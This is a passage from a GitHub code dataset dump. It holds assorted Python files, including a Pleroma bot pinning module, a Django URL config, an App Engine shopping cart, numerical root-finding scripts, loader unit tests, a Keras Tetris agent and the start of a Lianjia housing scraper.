Giving up unpinning...\"))\n # Clear pinned ids\n with open(pinned_file, \"w\") as file:\n file.write(\"\\n\")\n with open(pinned_file_twitter, \"w\") as file:\n file.write(\"\\n\")\n\n\ndef _find_pinned(self, pinned_file):\n page = 0\n headers_page_url = None\n while page < 10:\n if self.posts:\n for post in self.posts:\n if post[\"pinned\"]:\n with open(pinned_file, \"w\") as file:\n file.write(f'{post[\"id\"]}\\n')\n return self.unpin_pleroma(pinned_file)\n page += 1\n pleroma_posts_url = (\n f\"{self.pleroma_base_url}/api/v1/accounts/\"\n f\"{self.pleroma_username}/statuses\"\n )\n\n if headers_page_url:\n statuses_url = headers_page_url\n else:\n statuses_url = pleroma_posts_url\n response = requests.get(statuses_url, headers=self.header_pleroma)\n if not response.ok:\n response.raise_for_status()\n posts = json.loads(response.text)\n self.posts = posts\n try:\n links = requests.utils.parse_header_links(\n response.headers[\"link\"].rstrip(\">\").replace(\">,<\", \",<\")\n )\n for link in links:\n if link[\"rel\"] == \"next\":\n headers_page_url = link[\"url\"]\n except KeyError:\n break\n\n\ndef _get_pinned_tweet_id(self):\n \"\"\"Retrieves the pinned tweet by the user\n\n :returns: ID of currently pinned tweet\n \"\"\"\n url = (\n f\"{self.twitter_base_url_v2}/users/\"\n f\"by/username/{self.twitter_username}\"\n )\n params = {\n \"user.fields\": \"pinned_tweet_id\",\n \"expansions\": \"pinned_tweet_id\",\n \"tweet.fields\": \"entities\",\n }\n response = requests.get(\n url, headers=self.header_twitter, params=params, auth=self.auth\n )\n if not response.ok:\n response.raise_for_status()\n try:\n data = json.loads(response.text)\n pinned_tweet = data[\"includes\"][\"tweets\"][0]\n pinned_tweet_id = pinned_tweet[\"id\"]\n except (JSONDecodeError, KeyError):\n pinned_tweet_id = None\n pass\n return pinned_tweet_id\n\n\ndef get_pinned_tweet(self):\n return self.pinned_tweet_id\n","repo_name":"TrendingTechnology/pleroma-bot","sub_path":"pleroma_bot/_pin.py","file_name":"_pin.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"72606231292","text":"from django.urls import path, reverse\nfrom django.conf import urls\nfrom . 
import views\n\nurlpatterns = [\n\tpath(\"register/\", views.register, name=\"register\"),\n\tpath(\"login/\", views.loginpage, name=\"login\"),\n\tpath(\"log_out/\", views.logout, name=\"log_out\"),\n\n\tpath(\"\", views.dashboard, name=\"home\"),\n\tpath(\"update_process//\", views.updateprocess, name='update_process'),\n\tpath(\"userenter/\", views.userenter, name=\"userenter\"),\n\tpath(\"update_user//\", views.updateuser, name=\"update_user\"),\n\tpath(\"enterprocess/\", views.EnterProcess, name=\"enterprocess\"),\n\tpath(\"user_views//\", views.userviews, name=\"user_views\"),#jahate namayeshe user ha ke be template edituser.html mifreste\n\tpath(\"delete_process//\", views.deleteProcess, name='delete_process'),\n\tpath(\"chart/\", views.chart, name=\"chart\"),\n\tpath(\"machine_view//\", views.machineview, name=\"machine_view\"),\n\tpath(\"machine_enter/\", views.machineenter, name=\"machine_enter\"),\n\tpath(\"update_machine//\", views.updatemachine, name=\"update_machine\"),\n]","repo_name":"alifeiz67/samsteel","sub_path":"company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39535147244","text":"import os\nimport urllib\nimport random\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import ndb\n\nimport jinja2\nimport webapp2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nDEFAULT_GENRE = 'Non-fiction'\nDEFAULT_AUTHOR = 'zzzzzzzzzzz'\nDEFAULT_ERROR = 'false'\n\ndef genre_key(genre_name=DEFAULT_GENRE):\n \"\"\"Constructs a Datastore key for a Genre entity. We use genre_name as the key.\"\"\"\n return ndb.Key('Genre', genre_name.lower())\n\ndef cart_key(user):\n return ndb.Key('User', user)\n\nclass Book(ndb.Model):\n \"\"\"A main model for representing an individual Book entry.\"\"\"\n id = ndb.StringProperty(indexed=True) # uniquely defines a book\n author = ndb.StringProperty(indexed=True)\n title = ndb.StringProperty(indexed=False)\n price = ndb.FloatProperty(indexed=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n\nclass Cart(ndb.Model):\n book_id = ndb.StringProperty() # Does not store the entire book in the cart; only the id and genre\n book_genre = ndb.StringProperty()\n \nclass MainPage(webapp2.RequestHandler):\n\n def get(self): \n\n cookie_id = self.request.cookies.get('key') # if first time, then generate an cookie_id\n if cookie_id == None:\n cookie_id = str(random.randint(1000000000, 9999999999))\n \n user = users.get_current_user() # display different login info depending on whether the user has logged in\n if user:\n url = users.create_logout_url('/')\n nickname = user.nickname()\n hasLogin = True\n else:\n url = users.create_login_url('/')\n nickname = ''\n hasLogin = False \n \n genre_name = self.request.get('genre_name',\n DEFAULT_GENRE)\n genre_query = Book.query(\n ancestor=genre_key(genre_name.lower())).order(-Book.date)\n genre = genre_query.fetch(100)\n\n template_values = {\n 'genre': genre,\n 'genre_name': urllib.quote_plus(genre_name),\n 'url': url,\n 'nickname': nickname,\n 'hasLogin': hasLogin,\n }\n\n template = JINJA_ENVIRONMENT.get_template('index.html')\n self.response.write(template.render(template_values))\n self.response.headers.add_header('Set-Cookie', 'key=%s' % str(cookie_id)) \n\nclass EnterPage(webapp2.RequestHandler):\n def get(self):\n genre_name = 
self.request.get('genre_name', DEFAULT_GENRE)\n error = self.request.get('error', DEFAULT_ERROR)\n \n template_values = {\n 'genre_name': urllib.quote_plus(genre_name),\n 'error': urllib.quote_plus(error),\n }\n\n template = JINJA_ENVIRONMENT.get_template('enter.html')\n self.response.write(template.render(template_values))\n\nclass Enter(webapp2.RequestHandler):\n def post(self):\n genre_name = self.request.get('genre_name',\n DEFAULT_GENRE)\n book = Book(parent=genre_key(genre_name.lower()))\n\n book.author = self.request.get('author')\n book.title = self.request.get('title')\n query_param1 = {'genre_name': genre_name}\n \n def generateId(): # generate an unique id for each book, so that in the shopping cart we only need to store the id\n CHAR = [chr(i) for i in xrange(ord('A'), ord('Z')+1)] \\\n + [chr(i) for i in xrange(ord('a'), ord('z')+1)] \\\n + [chr(i) for i in xrange(ord('0'), ord('9')+1)]\n book_id = ''\n for i in xrange(20):\n book_id += CHAR[random.randint(0, len(CHAR) - 1)]\n return book_id\n \n book.id = generateId() \n \n is_float = True # check the validity of the price\n try:\n book.price = float(self.request.get('price')) \n except:\n is_float = False\n\n if book.author != '' and book.title != '' and is_float:\n book.put()\n self.redirect('/?' + urllib.urlencode(query_param1))\n else:\n query_param2 = {'error': 'true'}\n self.redirect('/enter?' + urllib.urlencode(query_param1) + '&' + urllib.urlencode(query_param2))\n\nclass DisplayPage(webapp2.RequestHandler):\n def get(self):\n genre_name = self.request.get('genre_name', DEFAULT_GENRE)\n genre_query = Book.query(\n ancestor=genre_key(genre_name.lower())).order(-Book.date)\n genre = genre_query.fetch(100)\n \n template_values = {\n 'genre': genre,\n 'genre_name': urllib.quote_plus(genre_name),\n }\n\n template = JINJA_ENVIRONMENT.get_template('display.html')\n self.response.write(template.render(template_values))\n\nclass Search(webapp2.RequestHandler):\n\n def get(self):\n genre_name = self.request.get('genre_name', DEFAULT_GENRE)\n author = self.request.get('author', DEFAULT_AUTHOR)\n author = author.lower()\n bookList = []\n genre_query = Book.query(\n ancestor=genre_key(genre_name.lower())).order(-Book.date)\n genre = genre_query.fetch(1000)\n if author != '':\n for book in genre:\n bookAuthor = book.author.lower()\n if bookAuthor.find(author) != -1:\n bookList.append(book)\n \n template_values = {\n 'bookList': bookList,\n 'genre_name': urllib.quote_plus(genre_name),\n 'author': urllib.quote_plus(author),\n }\n\n template = JINJA_ENVIRONMENT.get_template('search.html')\n self.response.write(template.render(template_values))\n\n def post(self):\n genre_name = self.request.get('genre_name', DEFAULT_GENRE)\n author = self.request.get('author')\n query_param1 = {'genre_name': genre_name}\n query_param2 = {'author': author}\n self.redirect('/search?' + urllib.urlencode(query_param1) + '&' + urllib.urlencode(query_param2))\n\nclass AddToCart(webapp2.RequestHandler):\n \n def post(self):\n user = users.get_current_user()\n if not user:\n user = self.request.cookies.get('key')\n else:\n user = user.email()\n books = self.request.get('book', allow_multiple=True) # get all the books that has been marked in the check box\n for book in books:\n cart = Cart(parent=cart_key(user))\n tokens = book.split('##')\n book_id, book_genre = tokens[0], tokens[1]\n cart.book_id = book_id # only store the book id and genre in the cart database\n cart.book_genre = book_genre\n cart.put()\n self.redirect('/cart?' 
+ urllib.urlencode({'user': user}))\n\nclass DisplayCart(webapp2.RequestHandler):\n \n def get(self):\n user = users.get_current_user()\n user_name = 'false'\n if not user:\n user = self.request.cookies.get('key')\n else:\n user = user.email()\n user_name = user\n cookie_id = self.request.cookies.get('key')\n cart_temp = Cart.query(ancestor=cart_key(cookie_id))\n if cart_temp: # if the user has logged in, then merge the temporary cart with his/her cart\n for book in cart_temp:\n cart = Cart(parent=cart_key(user))\n cart.book_id = book.book_id\n cart.book_genre = book.book_genre\n cart.put()\n book.key.delete() \n cart = Cart.query(ancestor=cart_key(user)) \n \n total = 0\n books = []\n for item in cart: # count the total price\n book = Book.query(ancestor=genre_key(item.book_genre.lower())).filter(Book.id == item.book_id).fetch(1) \n total += book[0].price\n books.extend(book)\n \n template_values = {\n 'cart': books,\n 'total': total,\n 'checkout': self.request.get('checkout'),\n 'user_name': user_name,\n }\n\n template = JINJA_ENVIRONMENT.get_template('cart.html')\n self.response.write(template.render(template_values)) \n\nclass CartOperations(webapp2.RequestHandler):\n \n def post(self):\n \n button_checkout = self.request.get(\"checkout\") # check which button in the
    has been clicked\r\n        button_remove = self.request.get(\"remove\")\r\n        \r\n        if button_checkout: # the checkout button has been clicked\r\n            user = users.get_current_user()\r\n            if user == None:\r\n                url = users.create_login_url('/cart')\r\n                self.redirect(url)  \r\n            else:\r\n                user = user.email()   \r\n                cart_temp = Cart.query(ancestor=cart_key(user))\r\n                for book in cart_temp:\r\n                    book.key.delete()\r\n                self.redirect('/cart?' + urllib.urlencode({'user': user}) + '&' + urllib.urlencode({'checkout': 'true'}))\r\n        \r\n        if button_remove: # the remove button has been clicked on\r\n            book_id = button_remove # the value of the button is the book id\r\n            user = users.get_current_user()\r\n            if not user:\r\n                user = self.request.cookies.get('key')\r\n            else:\r\n                user = user.email()\r\n            cart = Cart.query(ancestor=cart_key(user))\r\n            for book in cart:\r\n                if book.book_id == book_id: # delete the book only once\r\n                    book.key.delete()\r\n                    break\r\n            self.redirect('/cart?' + urllib.urlencode({'user': user}))\r\n        \r\n\r\napp = webapp2.WSGIApplication([\r\n    ('/', MainPage),\r\n    ('/enter', EnterPage),\r\n    ('/add', Enter),\r\n    ('/display', DisplayPage),\r\n    ('/search', Search),\r\n    ('/add-to-cart', AddToCart),\r\n    ('/cart', DisplayCart),\r\n    ('/cart-operations', CartOperations),\r\n], debug=False)\r\n","repo_name":"Hongyang-Wang/hongyang-shopping-cart","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":10060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40526866856","text":"import sys\r\nimport argparse\r\nglobal a \r\nglobal df\r\ndef fx(n):\r\n    return eval(a.replace('x',str(n)))\r\n\r\ndef dfx(n):\r\n    return eval(df.replace('x',str(n)))    \r\n\r\ndef solve(l,r,n):\r\n    mid=(l+r)/2\r\n    print('lower limit {}, upper limit {}, iteration {}, fx(mid) {}'.format(l,r,n,fx(mid)))\r\n    if(n==0):\r\n        return fx(mid)\r\n    if(fx(mid)<0):\r\n        return solve(mid,r,n-1)\r\n    else:\r\n        return solve(l,mid,n-1)\r\n\r\ndef inputEq():\r\n    global a\r\n    print(\"Enter the equation in one variable (Eg 3*x^2-4*x+5)\")\r\n    a=input()\r\n    a=a.replace('^','**')\r\n    a=a.replace(' ','')\r\n\r\ndef inputDfx():\r\n    global df\r\n    print(\"Derivative of fx u just entered (Eg 6*x-4)\")\r\n    df=input()\r\n    df=df.replace('^','**')\r\n    df=df.replace(' ','')\r\n\r\ndef newton_bisection():\r\n    inputEq()\r\n    print(\"Enter lower and upper limits (Spaced real no, Eg 6 11)\")\r\n    l,r=map(int,input().split())\r\n    print('Enter number of iteration (Eg 20)')\r\n    n=int(input())\r\n    if(fx(l)*fx(r)<0):\r\n        solve(l,r,n)\r\n    else:\r\n        print('Incorrect limits f(l)*f(r) should be <0 ')\r\n\r\ndef _newton_method(n,guess):\r\n    if(n==0):\r\n        temp=guess-fx(guess)/dfx(guess)\r\n        print('x{}= {} fx{} = {}'.format(n,temp,n,fx(temp)))\r\n        return guess-fx(guess)/dfx(guess)\r\n    nmm=_newton_method(n-1,guess)\r\n    temp=nmm-fx(nmm)/dfx(nmm)\r\n    print('x{}= {} fx{} = {}'.format(n,temp,n,fx(temp)))\r\n    return nmm-fx(nmm)/dfx(nmm)\r\ndef newton_method():\r\n    inputEq()\r\n    inputDfx()\r\n    print(\"Enter number of iteration\")\r\n    n=int(input())\r\n    print(\"Enter known x for which f(x)>0\")\r\n    guess=int(input())\r\n    _newton_method(n,guess)\r\n\r\nparser = argparse.ArgumentParser(\"numerical_techniques\",formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument(\"-bis\",\"--bisection_method\", help=\"bisection\", action='store_true')\r\nparser.add_argument(\"-nm\", \"--newton_method\", help=\"Newton secant method\", action='store_true')\r\nargs = parser.parse_args()\r\nif(args.bisection_method):\r\n    newton_bisection()\r\n    exit()\r\nif(args.newton_method):\r\n    newton_method()\r\n    exit()\r\n
","repo_name":"pallav12/numerical_techniques","sub_path":"nt.py","file_name":"nt.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18741428414","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport sklearn\nfrom sklearn.manifold import TSNE\nimport numpy as np\nfrom PIL import Image\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\nimport matplotlib\n\nCLASS_NAMES = [\n    'aeroplane',\n    'bicycle',\n    'bird',\n    'boat',\n    'bottle',\n    'bus',\n    'car',\n    'cat',\n    'chair',\n    'cow',\n    'diningtable',\n    'dog',\n    'horse',\n    'motorbike',\n    'person',\n    'pottedplant',\n    'sheep',\n    'sofa',\n    'train',\n    'tvmonitor',\n]\n\n\n\n\ndef load_pascal(data_dir, split='train'):\n    \"\"\"\n    Function to read images from PASCAL data folder.\n    Args:\n        data_dir (str): Path to the VOC2007 directory.\n        split (str): train/val/trainval split to use.\n    Returns:\n        images (np.ndarray): Return a np.float32 array of\n            shape (N, H, W, 3), where H, W are 224px each,\n            and each image is in RGB format.\n        labels (np.ndarray): An array of shape (N, 20) of\n            type np.int32, with 0s and 1s; 1s for classes that\n            are active in that image.\n        weights: (np.ndarray): An array of shape (N, 20) of\n            type np.int32, with 0s and 1s; 1s for classes that\n            are confidently labeled and 0s for classes that \n            are ambiguous.\n    \"\"\"\n    filename = data_dir+\"/ImageSets/Main/\" + split+\".txt\"\n    files = open(filename).read()\n    data_splitup = files.split('\\n')[:-1]\n    \n    N = len(data_splitup)\n\n    labels = np.zeros([N, len(CLASS_NAMES)],dtype = np.int32)\n    weights = np.zeros([N, len(CLASS_NAMES)], dtype =np.int32)\n    for class_number in range(len(CLASS_NAMES)):\n        class_files = []\n        filename2 = data_dir+\"/ImageSets/Main/\" + CLASS_NAMES[class_number] + \"_\" + split+\".txt\"\n        files2 = open(filename2).read()\n        data_splitup2 = files2.split('\\n')[:-1]\n\n        for file in data_splitup2:\n            file = file.split(\" \")\n            class_files.append([file[0],file[-1]])\n\n        for image_number in range(N):\n            if(int(class_files[image_number][1]) != 0):\n                weights[image_number, class_number] = 1\n            if(int(class_files[image_number][1]) == 1):\n                labels[image_number, class_number] = 1\n\n    if split == 'trainval':\n        images = np.empty([N,256,256,3], dtype = np.float32)\n        for i in range(N):\n            images[i,:,:,:] = Image.open(data_dir + '/JPEGImages/' + data_splitup[i]+ '.jpg').resize((256,256), Image.BILINEAR)\n    else:\n        images = np.empty([N, 224, 224, 3], dtype = np.float32)\n        for i in range(N):\n            images[i,:,:,:] = Image.open(data_dir +'/JPEGImages/'+data_splitup[i]+'.jpg').resize((256,256), Image.BILINEAR).crop((16,16,240,240))\n\n    return images, labels, weights\n\n\n\n\n\n\n#==== \n# Reference : https://github.com/oreillymedia/t-SNE-tutorial\ndef scatter(x, colors):\n    palette = np.array(sns.hls_palette(20))\n    plt.scatter(x[:,0], x[:,1], lw=0, s=40, alpha=0.4, c=palette[colors.astype(int)])\n    plt.show()\n\n\neval_data, eval_labels,eval_weights = load_pascal('VOCdevkit/VOC2007', split='test')\n\neval_labels = np.random.permutation(eval_labels)[:1000]\nlabels = np.zeros(1000)\ni = 0\nwhile (i < 1000):\n    labels[i] = np.average(np.where(eval_labels[i]==1))\n    i = i + 1\n\nalex_net = np.load('AlexNet.npy',encoding='bytes')\nalex_net = np.array(alex_net)\nfeatures = np.vstack([x['fc9'].flatten() for x in alex_net])\ntsne_proj 
=TSNE(n_components=2).fit_transform(features)\nsns.palplot(sns.hls_palette(20))\nscatter(tsne_proj,labels)\n\n","repo_name":"lukaeerens93/VLR","sub_path":"05_tsne.py","file_name":"05_tsne.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12379995371","text":"#!/usr/bin/env python\n\nimport os\nfrom os.path import join\nimport unittest\nfrom tempfile import mkdtemp\n\nfrom scipy.io import savemat\nimport Image\nimport numpy as np\n\nfrom ocupy import loader\n\n\nclass TestLoader(unittest.TestCase):\n\n #Test the interface\n def test_load_from_disk(self):\n # Generate a tmp fake data structure\n img_per_cat = {2:list(range(1,10)), 8:list(range(30,40)), 111:list(range(6,15))}\n path,_ = create_tmp_structure(img_per_cat) \n l = loader.LoadFromDisk(impath = path)\n for cat in list(img_per_cat.keys()):\n for image in img_per_cat[cat]:\n l.get_image(cat,image)\n self.assertTrue(l.test_for_category(cat))\n self.assertTrue(l.test_for_image(cat, image))\n # Test checks for non existing images\n no_img_per_cat = {0:list(range(1,10)), 7:list(range(30,40)), 110:list(range(6,15))}\n for cat in list(no_img_per_cat.keys()):\n for image in no_img_per_cat[cat]:\n self.assertTrue(not l.test_for_category(cat))\n self.assertTrue(not l.test_for_image(cat, image))\n no_img_per_cat = {2:list(range(11,20)), 8:list(range(20,30)), 111:list(range(16,40))}\n for cat in list(no_img_per_cat.keys()):\n for image in no_img_per_cat[cat]:\n self.assertTrue(not l.test_for_image(cat, image)) \n rm_tmp_structure(path)\n \n def test_load_from_disk_scaling(self):\n # Generate a tmp fake data structure\n img_per_cat = {2:list(range(1,10)), 8:list(range(30,40)), 111:list(range(6,15))}\n path,_ = create_tmp_structure(img_per_cat) \n l = loader.LoadFromDisk(impath = path, size = (10,10))\n for cat in list(img_per_cat.keys()):\n for image in img_per_cat[cat]:\n im = l.get_image(cat,image)\n self.assertTrue(im.shape[0] == 10 and im.shape[1] == 10)\n self.assertTrue(l.test_for_category(cat))\n self.assertTrue(l.test_for_image(cat, image))\n rm_tmp_structure(path)\n\n def test_save_to_disk(self):\n path = mkdtemp()\n ftrpath = mkdtemp()\n im_tmp = np.ones((100,100))\n l = loader.SaveToDisk(impath = path,ftrpath = ftrpath, size = (10,10))\n # Generate a tmp fake data structure\n img_per_cat = {2:list(range(1,10)), 8:list(range(30,40)), 111:list(range(6,15))}\n for cat in list(img_per_cat.keys()):\n # Create category dir\n for image in img_per_cat[cat]:\n l.save_image(cat, image, im_tmp)\n for f in ['a', 'b']:\n l.save_feature(cat, image, f, np.ones((10,10))) \n l = loader.LoadFromDisk(impath = path, ftrpath = ftrpath, size = (10,10))\n for cat in list(img_per_cat.keys()):\n for image in img_per_cat[cat]:\n im = l.get_image(cat,image)\n self.assertTrue(im.shape[0] == 10 and im.shape[1] == 10)\n self.assertTrue(l.test_for_category(cat))\n self.assertTrue(l.test_for_image(cat, image))\n self.assertTrue(l.test_for_feature(cat, image, 'a'), True) \n os.system('rm -rf %s' %path)\n os.system('rm -rf %s' %ftrpath)\n\n \n def test_testloader(self):\n img_per_cat = {1: list(range(1,10)), 2: list(range(1,10))}\n l = loader.TestLoader(img_per_cat = img_per_cat, features = ['a', 'b'])\n for cat in range(1,10):\n for img in range(1,100):\n if cat in list(img_per_cat.keys()) and img in img_per_cat[cat]: \n self.assertEqual(l.test_for_category(cat), True)\n self.assertEqual(l.test_for_image(cat, img), True)\n self.assertEqual(l.test_for_feature(cat, 
img, 'a'), True)\n l.get_image(cat, img)\n l.get_feature(cat, img, 'a')\n l.get_feature(cat, img, 'b')\n self.assertTrue(l.test_for_feature(cat, img, 'a'))\n else:\n self.assertEqual(l.test_for_image(cat, img), False)\n self.assertRaises(IndexError, lambda: l.get_image(cat, img))\n \ndef create_tmp_structure(img_per_cat, features = None):\n im_tmp = Image.fromarray(np.ones((1,1))).convert('RGB') \n path = mkdtemp()\n ftr_path = None\n if features:\n ftr_path = mkdtemp()\n for cat in list(img_per_cat.keys()):\n # Create category dir\n os.mkdir(join(path, str(cat)))\n if features:\n for feature in features:\n os.makedirs(join(ftr_path, str(cat), str(feature))) \n for image in img_per_cat[cat]:\n im_tmp.save(join(path,str(cat),'%i_%i.png'%(cat, image)))\n if features:\n for feature in features:\n savemat(join(ftr_path,str(cat),\n feature, '%i_%i.mat'%(cat, image)),\n {'output':np.ones((1,1))})\n return path, ftr_path\n\ndef rm_tmp_structure(path):\n os.system('rm -rf %s' %path)\n\n \n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nwilming/ocupy","sub_path":"ocupy/tests/test_loader.py","file_name":"test_loader.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"78"} +{"seq_id":"37601039875","text":"import keras\r\nfrom keras import initializers\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense\r\nfrom collections import deque\r\nimport numpy as np\r\nimport random\r\nimport sys\r\n\r\nclass Agent:\r\n\tdef __init__(self, state_size):\r\n\t\tself.state_size = state_size\r\n\t\tself.memory = deque(maxlen=30000)\r\n\t\tself.discount = 0.95\r\n\t\tself.epsilon = 1.0\r\n\t\tself.epsilon_min = 0.001 \r\n\t\tself.epsilon_end_episode = 2000\r\n\t\tself.epsilon_decay = (self.epsilon - self.epsilon_min) / self.epsilon_end_episode\r\n\r\n\t\tself.batch_size = 512\r\n\t\tself.replay_start = 3000\r\n\t\tself.epochs = 1\r\n\r\n\t\tself.model = self.build_model()\r\n\r\n\tdef build_model(self):\r\n\t\tmodel = keras.Sequential([\r\n\t\t\t\tDense(64, input_dim=self.state_size, activation='relu', kernel_initializer='glorot_uniform'),\r\n\t\t\t\tDense(64, activation='relu', kernel_initializer='glorot_uniform'),\r\n\t\t\t\tDense(32, activation='relu', kernel_initializer='glorot_uniform'),\r\n\t\t\t\tDense(1, activation='linear')\r\n\t\t])\r\n\r\n\t\tmodel.compile(loss='mse', optimizer='adam')\r\n\t\treturn model\r\n\r\n\tdef add_to_memory(self, current_state, next_state, reward, done):\r\n\t\tself.memory.append([current_state, next_state, reward, done])\r\n\r\n\tdef act(self, states):\r\n\t\tmax_value = -sys.maxsize - 1\r\n\t\tbest = None\r\n\r\n\t\tif random.random() <= self.epsilon:\r\n\t\t\treturn random.choice(list(states))\r\n\t\telse:\r\n\t\t\tfor state in states:\r\n\t\t\t\tvalue = self.model.predict(np.reshape(state, [1, self.state_size]))\r\n\t\t\t\tif value > max_value:\r\n\t\t\t\t\tmax_value = value\r\n\t\t\t\t\tbest = state\r\n\t\t\r\n\t\treturn best\r\n\r\n\tdef replay(self):\r\n\t\tif len(self.memory) > self.replay_start:\r\n\t\t\tbatch = random.sample(self.memory, self.batch_size)\r\n\r\n\t\t\tnext_states = np.array([s[1] for s in batch])\r\n\t\t\tnext_qvalue = np.array([s[0] for s in self.model.predict(next_states)])\r\n\r\n\t\t\tx = []\r\n\t\t\ty = []\r\n\r\n\r\n\t\t\tfor i in range(self.batch_size):\r\n\t\t\t\tstate, _, reward, done = batch[i][0], None, batch[i][2], batch[i][3]\r\n\t\t\t\tif not done:\r\n\t\t\t\t\tnew_q = reward + self.discount * 
next_qvalue[i]\r\n\t\t\t\telse:\r\n\t\t\t\t\tnew_q = reward\r\n\r\n\t\t\t\tx.append(state)\r\n\t\t\t\ty.append(new_q)\r\n\r\n\t\t\tself.model.fit(np.array(x), np.array(y), batch_size=self.batch_size, epochs=self.epochs, verbose=0)\r\n","repo_name":"andreanlay/tetris-ai-deep-reinforcement-learning","sub_path":"src/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"39570534202","text":"\r\n# This function shows the statistical information.\r\ndef statistics(total_bookings, rows, clms, current_inc):\r\n    \r\n    # Print total seat bookings\r\n    print('Number of purchased tickets:', total_bookings)\r\n    \r\n    # Calculating total seats\r\n    total_seats = rows * clms\r\n    print('Percentage:', (total_bookings / total_seats) * 100 )\r\n    \r\n    # Calculating current income\r\n    print('Current income:', current_inc)\r\n    \r\n    #### Calculating Total income ####\r\n    \r\n    total_inc = 0\r\n    # Finding middle row for cost confirmation.\r\n    half_st_posn = int(rows / 2)\r\n\r\n    # Logic to find total income \r\n    if total_seats > 60:\r\n        total_inc = (half_st_posn * clms * 10) + ((rows - half_st_posn) * clms * 8)\r\n    else:\r\n        total_inc = total_seats * 10\r\n    \r\n    print('Total income:', total_inc)","repo_name":"ramasureshvijjana/EdYoda","sub_path":"Book_My_Show/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +
{"seq_id":"86738535883","text":"#!/usr/bin/env python3\r\n\r\nimport os\r\nimport cv2\r\nimport argparse\r\nimport pandas as pd\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    # Argument parser\r\n    argpars = argparse.ArgumentParser()\r\n    argpars.add_argument(\"--img-folder\", required=True, help=\"INFO >> Path to the folder containing the images to label.\")\r\n    args = argpars.parse_args()\r\n\r\n    # Get list of files in the folder\r\n    if not os.path.exists(args.img_folder):\r\n        raise RuntimeError(f\"Path {args.img_folder} does not exist!\")\r\n\r\n    file_list = os.listdir(args.img_folder) # will contain the photos\r\n    file_list.sort()\r\n\r\n    # Check if the labels file exists\r\n    if os.path.exists(\"../../annotations/annotations.csv\"):\r\n        print(\"INFO >> Continuing existing annotation...\")\r\n        df = pd.read_csv(\"../../annotations/annotations.csv\", index_col=False)\r\n\r\n    else:\r\n        print(\"INFO >> New annotation...\")\r\n        data = {\r\n            \"file_name\": file_list,\r\n            \"smoke\": [-1]*len(file_list),\r\n        }\r\n\r\n        df = pd.DataFrame(data=data)\r\n    \r\n    for row in df.iterrows():\r\n        if row[1][1] == -1:\r\n            try:\r\n                img = cv2.imread(os.path.join(args.img_folder, row[1][0]))\r\n                cv2.imshow(\"Current frame\", img)\r\n                cv2.waitKey(50)\r\n\r\n                labels = [-1]\r\n\r\n                while labels[0] not in [1, 0]:\r\n                    try:\r\n                        labels[0] = int(\r\n                            input(\"INFO >> Does the frame have smoke inside? (0 = NO, 1 = YES) \"))\r\n                    except ValueError:\r\n                        print(\"INFO >> Please insert an integer value!\")\r\n\r\n\r\n                df.loc[row[0], [\"smoke\"]] = labels[0]\r\n                cv2.destroyAllWindows()\r\n                cv2.waitKey(50)\r\n\r\n            except KeyboardInterrupt:\r\n                break\r\n    \r\n    df.to_csv(\"../../annotations/annotations.csv\", index=False)\r\n","repo_name":"alesorr/smoke-detector","sub_path":"source/utils/img_annotation.py","file_name":"img_annotation.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27940168492","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom lxml import etree\nfrom openpyxl import load_workbook, Workbook\nimport requests\nimport matplotlib.pyplot as plt\n\nregions = {'dongcheng': 100, 'xicheng': 100, 'chaoyang': 100, 'haidian': 100, 'fengtai': 100, 'shijingshan': 100,\n           'tongzhou': 100, 'changping': 100, 'daxing': 100, 'yizhuangkaifaqu': 48, 'shunyi': 100, 'fangshan': 100,\n           'mentougou': 49, 'pinggu': 3, 'huairou': 1, 'miyun': 3, 'yanqing': 1,\n           }\n\n\ndef getPage(region, index):\n    url = 'https://bj.lianjia.com/ershoufang/' + str(region) + '/pg' + str(index)\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',\n    }\n    html = requests.get(url, headers=headers).text\n    html = etree.HTML(html)\n    main_info = html.xpath('//ul[contains(@class,\"sellListContent\")]/li')\n    result = []\n    for m in main_info:\n        title = m.xpath('div//div[@class=\"title\"]/a/text()')[0]\n        houseInfo = m.xpath('div//div[@class=\"houseInfo\"]/text()')[0]\n        totalPrice = ''.join(m.xpath('div//div[@class=\"totalPrice\"]//text()'))\n        unitPrice = m.xpath('div//div[@class=\"unitPrice\"]//text()')[0]\n        address = '-'.join(m.xpath('div//div[@class=\"positionInfo\"]/a/text()'))\n        result.append([title, houseInfo, totalPrice, unitPrice, address])\n    return result\n\n\ndef 